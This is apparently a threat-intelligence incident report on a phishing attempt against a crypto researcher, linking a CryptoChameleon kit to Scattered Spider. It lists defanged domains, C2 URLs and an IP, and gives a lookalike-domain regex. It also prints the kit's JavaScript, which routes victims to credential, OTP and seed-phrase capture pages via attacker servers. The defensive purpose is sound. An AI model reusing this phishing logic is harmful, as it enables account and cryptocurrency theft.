{%hackmd C76nuH1pTfedlTW7n2cwbQ %} # **CryptoChameleon Campaign Associations with Scattered Spider** **Date of Report**: 2024 \- 12 \- 04\ **Reporting Agency**: Cipher\ **Report Composed By**: Cipher\ **Type of Incident**: Social Engineering, Phishing\ **Phishing Target**: `@Tayvanno` **Estimated Loss**: N/A - No user impacts ## Executive Summary **Overview**: This report is intended to expand upon the functionalities of a threat actor which research indicates is targeting cryptocurrency companies and developers. | Key Information | Detail | | :------------------------- | :----------------------------------------------------------------- | | Incident Date and Time | `2024-11-30` | | Phishing Website | `1735562-coinbase[.]com/captcha?origin=.` | | Snapshot of Malicious Site | `https://urlquery.net/report/8cea3a49-64a4-4373-a52a-7c5a73cd5e32` | | Attacker Email Sender | `help@xn--conbase-sfb[].]com` | | Attacker Phone | `802-772-0215` | **Report TLP Classification**: 🟢 Green ## Incident Background ### Phishing Attempt Events On `November 30, 2024`, [@Tayvano](https://x.com/tayvano_) was repeatedly spammed phone calls from `802-772-0215` and was eventually emailed the link `1735562-coinbase[.]com/captcha?origin=.` from sender `help@xn--conbase-sfb[].]com`. Javascript functionality observed from malicious link in question indicates targeted social engineering and phishing attacks originating from IP `195[.]133[.]92[.]187`. Analysis by target subject:@Tayvanno found instance control servers: `hxxps[://]c26[.]commandandcontrolserver[.]com` and `hxxps[://]c26x2[.]commandandcontrolserver[.]com/api`. Initial threat report and analysis by:[@Tayvanno](https://x.com/tayvano_/status/1863025389385503020) led to further analysis. The purpose of this report is to expand on correlations observed with past known Scattered Spider activity. ### Financial Impact No financial impacts or further user impacts reported, as target subject is highly technical and an information security subject matter expert. ## Technical Analysis  | URL | Size | First Seen | Last Seen | | :--------------------------------------------- | ------ | ---------------- | ---------------- | | 1735562-coinbase[.]com/js/index/core[.]js | 301 B | 2024-12-01 05:51 | 2024-12-01 05:51 | | 1735562-coinbase[.]com/js/init[.]js | 6.9 kB | 2024-12-01 05:51 | 2024-12-01 05:51 | | cdn[.]socket[.]io/4.5.4/socket[.]io[.]min[.]js | 44 kB | 2023-03-12 17:27 | 2024-12-01 11:09 | | 1735562-coinbase[.]com/js/consts[.]js | 161 B | 2024-12-01 05:51 | 2024-12-01 05:51 | | 1735562-coinbase[.]com/js/index/script[.]js | 232 B | 2023-11-19 14:01 | 2024-12-01 05:51 | As stated in the [report by Lookout](https://www.lookout.com/threat-intelligence/article/cryptochameleon-fcc-phishing-kit) this phishing sample is claimed to be of the "CryptoChameleon" campaign, the attack vector employs the `consts[.]js` file for communicating to control servers. However, further inspection and random sampling of the credential phishing instances indicate a pattern more greatly aligned with Scattered Spider activity. ```js const SERVER_URL = 'hxxps[://]c26[.]commandandcontrolserver[.]com'; const API_URL = 'hxxps[://]c26x2[.]commandandcontrolserver[.]com/api'; const OLD_PW_ON_RESET_PAGE = true; ``` The wide array of redirect functionality can be observed at the path: `/js/init[.]js`. <details> <summary>expand snippet relevant to `/js/init[.]js` here </summary> ```js socket.on('userRedirect', async (data) => { if (sessionStorage.getItem('user') === data.user && sessionStorage.getItem('user') !== null) { const redirectTkn = data.redirectTkn; const d = await fetch(`${API_URL}/verify`, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ token: redirectTkn }), }); const res = await d.json(); if (!res.valid) return; const basePath = window.location.href.substring(0, window.location.href.lastIndexOf('/')); if (data.response === '/otp_sms' || data.response === '/twitter_sms') { document.location.href = basePath + data.response + '?n=' + data.digits + '&e=' + data.e + '&f=' + data.format; } else if (data.response === '/outlook_otp' || data.response === '/binance_sms') { document.location.href = basePath + data.response + '?n=' + data.digits + '&e=' + data.e; } else if (data.response === '/custom') { document.location.href = basePath + data.response + '?h=' + data.header + '&p=' + data.paragraph; } else if ( data.response === '/otp_auth' || data.response === '/yahoo' || data.response === '/reset_password' || data.response === '/outlook_pw' || data.response === '/gemini_otp' || data.response === '/gemini_reset' || data.response === '/gemini_seed' || data.response === '/kraken' || data.response === '/kraken_otp' || data.response === '/icloud' || data.response === '/twitter' || data.response === '/twitter_auth' || data.response === '/gmail' || data.response === '/binance' || data.response === '/binance_auth' || data.response === '/gemini_signin' || data.response === '/uphold' || data.response === '/uphold_otp' || data.response === '/uphold_reset' || data.response === '/uphold_seed' || data.response === '/binance_seed' || data.response === '/kraken_seed' || data.response === '/lastpass' || data.response === '/lastpass_otp' || data.response === '/swan' || data.response === '/swan_seed' || data.response === '/swan_eotp' || data.response === '/swan_otp' || data.response === '/swan_auth' || data.response === '/swan_dvc' || data.response === '/gemini_dvc' || data.response === '/kucoin' || data.response === '/kucoin_otp' || data.response === '/kucoin_pin' || data.response === '/kucoin_seed' ) { if (data.response === '/gmail' && data.e === 1) { document.location.href = basePath + '/gmail_pw?e=' + data.e; } else { document.location.href = basePath + data.response + '?e=' + data.e; } } else if (data.response === '/signin') { document.location.href = basePath + data.response + '?e=' + data.e + '&t=' + data.t; } else if (data.response === '/pending_review') { document.location.href = basePath + data.response + '?d=' + btoa(data.date); } else if (data.response === '/aol_otp' || data.response === '/yahoo_otp' || data.response === '/gmail_otp') { document.location.href = basePath + data.response + '?email=' + data.address + '&n=' + data.digits + '&e=' + data.e; } else if (data.response === '/yahoo_eotp') { document.location.href = basePath + data.response + '?email=' + data.address + '&recovery=' + data.recovery + '&e=' + data.e; } else if (data.response == '/gmail_eotp' || data.response == '/gmail_auth' || data.response == '/otp_email') { document.location.href = basePath + data.response + '?email=' + data.address + '&e=' + data.e; } else if (data.response == '/lastpass_inbox' || data.response == '/dvc_press') { document.location.href = basePath + data.response + '?email=' + data.address; } else if (data.response === '/gmail_device') { document.location.href = basePath + data.response + '?email=' + data.address + '&n=' + data.digits + '&app=' + data.app; } else if (data.response === '/aol' || data.response === '/gmail_backup') { document.location.href = basePath + data.response + '?email=' + data.address + '&e=' + data.e; } else if (data.response === '/seed') { document.location.href = basePath + data.response + '?auth=' + data.auth; } else if (data.response === '/cb_customwallet') { document.location.href = basePath + data.response + '?w=' + data.w; } else if (data.response === '/icloud_otp') { document.location.href = basePath + data.response + '?p=' + data.p + '&e=' + data.e; } else if (data.response === '/device_auth') { document.location.href = basePath + data.response + '?device=' + data.device + '&location=' + data.location; } else if (data.response === '/redirect') { document.location.href = basePath + data.response + '?url=' + encodeURIComponent(data.url); } else if (data.response === '/icloud_2fa') { document.location.href = basePath + data.response + '?d=' + data.d; } else if (data.response === '/cbw1') { document.location.href = basePath + data.response + '?s=' + btoa(data.s); } else { document.location.href = basePath + data.response; } } }); ``` </details> ### Domain Research Domains were searched for using Validin, Censys, Silent Push, and UrlScan[.]io in order to maximize research surface.  https://www.virustotal.com/graph/embed/g97f881e0970340eca55e0b33440d413ee77a2a8a3c024f7c9dffd7942e36fd8f?theme=dark Baseline cryptocurrency domain name regex pattern analysis unit: ```shell \b(?:www[.]|\d+[-])?0*\d{5,}-(coinbase|binance|gemini|kraken|ledger|trezor)\[?\.\]?com\b ``` Unit was utilized to compose a counter pattern to review instances not matching the coinbase google impersonation sample `2024-12-07`: `hxxps[://]cancel-google[.]com/captcha?origin=gmail` https://pro.urlscan.io/result/460e3ae0-9718-431c-b065-84ddab1d525c  image sourced from: https://www.researchgate.net/figure/Example-of-homograph-domain-names_fig2_335823813 #### Domains observed at ip `195[.]133[.]92[.]187` at time of event <details> <summary>expand</summary> - 12518234-coinbase[.]com - 125980-binance[.]com - 128594-gemini[.]com - 129581-coinbase[.]com - 129645-coinbase[.]com - 143516-coinbase[.]com - 14522564-coinbase[.]com - 147852-kraken[.]com - 148942-coinbase[.]com - 149024-google[.]com - 1502759-ledger[.]com - 151294-kraken[.]com - 152674-coinbase[.]com - 157192-uphold[.]com - 1581932-coinbase[.]com - 158248-gemini[.]com - 159120-coinbase[.]com - 159823-coinbase[.]com - 1652137-coinbase[.]com - 17255030-coinbase[.]com - 17384624-coinbase[.]com - 17503-apple[.]com - 1750314-apple[.]com - 1759654-coinbase[.]com - 17691-coinbase[.]com - 177250-cb[.]com - 177250-kraken[.]com - 178492-coinbase[.]com - 178526-coinbase[.]com - 179325-coinbase[.]com - 18364712-coinbase[.]com - 184625-trezor[.]com - 1847039-coinbase[.]com - 185126-coinbase[.]com - 185924-uphold[.]com - 19045-coinbase[.]com - 191284-gemini[.]com - 19243652-coinbase[.]com - 19265-coinbase[.]com - 19453264-coinbase[.]com - 19463752-coinbase[.]com - 1947245-google[.]com - 194857-kraken[.]com - 195-133-92-187[.]waldertype[.]com - 195024-coinbase[.]com - 19513657-coinbase[.]com - 195824-swanbtc[.]com - 19642-coinbase[.]com - 197287-coinbase[.]com - 27954383-coinbase[.]com - 283272-coinbase[.]com - 298193-coinbase[.]com - 489912-coinbase[.]com - 53201-coinbase[.]com - 592013-apple[.]com - 76159869-coinbase[.]com - 77195062-coinbase[.]com - 848312-coinbase[.]com - 884394-coinbase[.]com - 917260-coinbase[.]com - 923852-coinbase[.]com - administration-icloud[.]com - adsupport-google[.]com - argoworkflow[.]binancesecurity[.]com - bcmone[.]mypasskey[.]info - binancesecurity[.]com - bruno[.]skybluesimply[.]com - calls-coinbase[.]com - cancel-google[.]com - cb-panel[.]com - cdn[.]receipt-coinbase[.]com - coinbase[.]passkeysetup[.]com - coinbasehelpdesk[.]com - coinbasetickets[.]com - cpanel[.]coinbasehelpdesk[.]com - cpcalendars[.]coinbasehelpdesk[.]com - cpcontacts[.]1947245-google[.]com - cpcontacts[.]coinbasehelpdesk[.]com - cpcontacts[.]dashboard-kucoin[.]com - cpcontacts[.]yahoohelpdesk[.]com - dash[.]s-kucoin[.]com - dashboard-kraken[.]com - dashboard-kucoin[.]com - ebdisk[.]17255030-coinbase[.]com - emv1[.]148942-coinbase[.]com - emv1[.]1502759-ledger[.]com - emv1[.]17384624-coinbase[.]com - emv1[.]1759654-coinbase[.]com - emv1[.]19463752-coinbase[.]com - emv1[.]firewall-cb[.]com - emv1[.]lastpasshelp[.]com - emv1[.]protection-kraken[.]com - emv1[.]ticketsupport-coinbase[.]com - establish-coinbase[.]com - firewall-cb[.]com - fraudulent-coinbase[.]com - gamdomrewards[.]com - google[.]mypasskey[.]info - help-applecare[.]com - help-coinbasesupport[.]com - helpdesk-google[.]com - hostmaster[.]msfthelpdesk[.]com - hostmaster[.]www[.]msfthelpdesk[.]com - idsmac-apple[.]com - iticket-apple[.]com - lastpasshelp[.]com - mail[.]coinbasehelpdesk[.]com - mail[.]yahoohelpdesk[.]com - msfthelpdesk[.]com - mypasskey[.]info - passkeysetup[.]com - portal-exodus[.]com - portal-trezor[.]io - protection-kraken[.]com - receipt-coinbase[.]com - refund-cb[.]com - revert-kraken[.]com - s-binance[.]com - s-gemini[.]com - s-kucoin[.]com - secureaccess-coinbase[.]com - shield-cbwallet[.]com - signin-kraken[.]com - signin-swanbitcoin[.]com - staging[.]verification-gemini[.]com - startrecovery-coinbase[.]com - swap-coinbase[.]com - ticketsupport-coinbase[.]com - verification-gemini[.]com - verification-trezor[.]com - verify-ledger[.]com - webdisk[.]coinbasehelpdesk[.]com - webmail[.]coinbasehelpdesk[.]com - www-help-gemini[.]com - www[.]12518234-coinbase[.]com - www[.]125980-binance[.]com - www[.]128594-gemini[.]com - www[.]129581-coinbase[.]com - www[.]129645-coinbase[.]com - www[.]143516-coinbase[.]com - www[.]148942-coinbase[.]com - www[.]149024-google[.]com - www[.]1502759-ledger[.]com - www[.]157192-uphold[.]com - www[.]1581932-coinbase[.]com - www[.]159120-coinbase[.]com - www[.]159823-coinbase[.]com - www[.]1652137-coinbase[.]com - www[.]17255030-coinbase[.]com - www[.]17384624-coinbase[.]com - www[.]1759654-coinbase[.]com - www[.]17691-coinbase[.]com - www[.]178492-coinbase[.]com - www[.]178526-coinbase[.]com - www[.]179325-coinbase[.]com - www[.]18364712-coinbase[.]com - www[.]185126-coinbase[.]com - www[.]185924-uphold[.]com - www[.]19045-coinbase[.]com - www[.]19265-coinbase[.]com - www[.]19453264-coinbase[.]com - www[.]19463752-coinbase[.]com - www[.]1947245-google[.]com - www[.]195024-coinbase[.]com - www[.]19513657-coinbase[.]com - www[.]19642-coinbase[.]com - www[.]197287-coinbase[.]com - www[.]27954383-coinbase[.]com - www[.]283272-coinbase[.]com - www[.]298193-coinbase[.]com - www[.]53201-coinbase[.]com - www[.]592013-apple[.]com - www[.]76159869-coinbase[.]com - www[.]884394-coinbase[.]com - www[.]917260-coinbase[.]com - www[.]923852-coinbase[.]com - www[.]adsupport-google[.]com - www[.]binancesecurity[.]com - www[.]calls-coinbase[.]com - www[.]cancel-google[.]com - www[.]coinbasehelpdesk[.]com - www[.]coinbasetickets[.]com - www[.]emv1[.]protection-kraken[.]com - www[.]establish-coinbase[.]com - www[.]firewall-cb[.]com - www[.]fraudulent-coinbase[.]com - www[.]help-applecare[.]com - www[.]help-coinbasesupport[.]com - www[.]helpdesk-google[.]com - www[.]idsmac-apple[.]com - www[.]iticket-apple[.]com - www[.]lastpasshelp[.]com - www[.]msfthelpdesk[.]com - www[.]passkeysetup[.]com - www[.]portal-trezor[.]io - www[.]protection-kraken[.]com - www[.]receipt-coinbase[.]com - www[.]refund-cb[.]com - www[.]s-binance[.]com - www[.]shield-cbwallet[.]com - www[.]signin-kraken[.]com - www[.]startrecovery-coinbase[.]com - www[.]swap-coinbase[.]com - www[.]ticketsupport-coinbase[.]com - www[.]verification-gemini[.]com - www[.]webmail[.]coinbasehelpdesk[.]com - www[.]www-help-gemini[.]com - www[.]yahoohelpdesk[.]com - yahoohelpdesk[.]com - zsb[.]125980-binance[.]com </details> ## Report Objectives The intentions of this report are to inform cryptocurrency companies and developers of an active phishing campaign which could impact anyone. It is also intended to convey the issue to law enforcement, for their extended analysis, as well as to garner greater interest from the information security community as those perpetuating these instances could modify domain names and expand their reach quite rapidly. ## Conclusion This incident highlights the sophisticated methods used by cybercriminals in phishing campaigns and social engineering attacks. It emphasizes the need for heightened awareness and security measures. ## Interaction with Law Enforcement **Agencies Notified**: N/A\ **Notification Date**: **Report Reference Number**: ## References and Attachments - [Trellix - Scattered Spider The Modus Operandi](https://www.trellix.com/blogs/research/scattered-spider-the-modus-operandi/) - [CryptoChameleon FCC Phishing Kit](https://www.lookout.com/threat-intelligence/article/cryptochameleon-fcc-phishing-kit) - [OTX Alienvault Pulse](https://otx.alienvault.com/pulse/6658476de649d167335d6250) - [A Modern Kill Chain Case Study: The CryptoChameleon Phishing Kit](https://www.blackhat.com/html/webcast/05232024.html) - ['Reptile Recon': Silent Push uses IP diversity queries to map out CryptoChameleon fast flux IOFAs](https://www.silentpush.com/blog/cryptochameleon/) - [Beware of CryptoChameleon, the new phishing threat that uses social engineering to trick victims](https://blogs.vmware.com/euc/2024/03/beware-of-cryptochameleon-the-new-phishing-threat-that-uses-social-engineering-to-trick-victims.html)